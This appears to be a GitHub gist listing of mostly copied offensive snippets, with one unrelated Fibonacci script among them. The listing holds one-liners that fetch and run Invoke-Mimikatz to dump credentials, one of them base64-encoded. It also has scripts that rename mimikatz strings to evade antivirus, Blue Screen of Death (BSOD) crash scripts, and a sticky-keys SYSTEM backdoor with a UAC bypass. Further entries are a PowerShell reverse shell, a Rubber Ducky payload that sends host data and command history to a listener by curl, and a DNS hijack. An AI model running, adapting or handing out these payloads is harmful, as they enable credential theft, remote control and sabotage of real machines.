JonnyBanana
/ Quick-Mimikatz
Created
March 6, 2018 05:31
— forked from gfoss/Quick-Mimikatz
Quick Mimikatz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
| #mimikatz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m | |
| #encoded-mimikatz | |
| powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA== | |
| #mimikittenz | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master |
JonnyBanana
/ Easy Fibonacci Sequence Calculator
Last active
April 8, 2018 20:39
Easy Fibonacci Sequence Calculator in Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a,b=0,1 | |
| while(b < WRITE THE MAXIMUM NUMBER OF THE SEQUENCE): | |
| print(b) | |
| a,b=b,a+b | |
| ### EXAMPLE, CALCULATE THE SEQUENCE UP TO NUMBER 1000000 ### | |
| a,b=0,1 | |
| while(b < 1000000): |
JonnyBanana
/ mimikatz_obfuscator.sh
Created
April 1, 2018 23:43
— forked from imaibou/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/windows | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
JonnyBanana
/ Quick-Invoke-BSOD
Created
April 8, 2018 20:44
invoke BSOD "the Blue Screen of Death" from Windows PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *NOTE - invoke BSOD "the Blue Screen of Death" i have take this script from here: https://github.com/peewpw/Invoke-BSOD* | |
| PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD |
JonnyBanana
/ invoke_evasion.sh
Created
April 8, 2018 21:59
— forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
JonnyBanana
/ Blue Screener
Created
April 17, 2018 03:10
https://github.com/Kernel-ROM/Duck-Scripts/blob/master/Scripts/BlueScreener.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Title: BlueScreener | |
| REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows | |
| DELAY 4000 | |
| CONTROL ESCAPE | |
| DELAY 200 | |
| STRING powershell | |
| CTRL-SHIFT ENTER | |
| DELAY 1500 | |
| ALT y | |
| DELAY 600 |
JonnyBanana
/ StickyWindowsBackdoor
Created
April 17, 2018 03:13
https://github.com/Kernel-ROM/Duck-Scripts/blob/master/Scripts/StickyWindowsBackdoor.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Note: Adjust delays to match host CPU speed | |
| REM To Undo: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" | |
| REM Desc: Adds a registry entry to enable the classic sticky keys SYSTEM level cmd backdoor | |
| REM UAC CMD Bypass | |
| DELAY 2000 | |
| CONTROL ESCAPE | |
| DELAY 300 | |
| STRING cmd | |
| CTRL-SHIFT ENTER |
JonnyBanana
/ Powershell_Reverse_Shell
Created
April 17, 2018 03:25
https://github.com/SynAckPwn23/Rubber-Ducky-Arsenal/tree/master/WINDOWS/Powershell_Reverse_Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #A simple and small reverse shell. Options and help removed to save space. | |
| #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. | |
| $client = New-Object System.Net.Sockets.TCPClient("192.168.1.15",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
| #$sm=(New-Object Net.Sockets.TCPClient("192.168.1.15",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
JonnyBanana
/ exfiltrate some infos...
Created
April 17, 2018 03:29
https://github.com/duckinator/rubber-ducky-scripts/blob/master/scripts/exfiltrate.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Exfiltrate various useful information. | |
| REM To capture, run `nc -l 9999`. | |
| REM Make sure to update the hostname before using it. | |
| DELAY 1000 | |
| ALT F2 | |
| DELAY 100 | |
| STRING sh -c "{ printf 'Hostname: '; hostname; echo; printf 'uname: '; uname -a; echo; echo Env:; env; echo; echo Network:; nmcli; echo; /sbin/ifconfig -a; echo '/etc/hosts:'; cat /etc/hosts; echo; echo Mounts:; mount; echo; echo 'Running services:'; netstat -tunlpe; echo; echo 'Installed packages:'; dpkg -l || dnf list --installed || pacman -Ql; echo; echo 'Command history:'; history; echo; } | curl -F data='<-' http://eternal-pickle:9999" | |
| ENTER |
JonnyBanana
/ networkmanager-dns-mitm
Created
April 17, 2018 03:33
https://github.com/duckinator/rubber-ducky-scripts/blob/master/scripts/networkmanager-dns-mitm.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Set up a DNS-based MITM attack. | |
| DELAY 1000 | |
| ALT F2 | |
| DELAY 100 | |
| STRING sh -c 'function mitm() { for ((i=0;i<10;i++)); do nmcli connection modify "$1" -ipv4.dns 0; done; nmcli connection modify "$1" +ipv4.dns 8.8.8.8; }; for x in $(nmcli -t connection show --active | cut -d: -f1); do mitm "$x"; done;' | |
| ENTER |
OlderNewer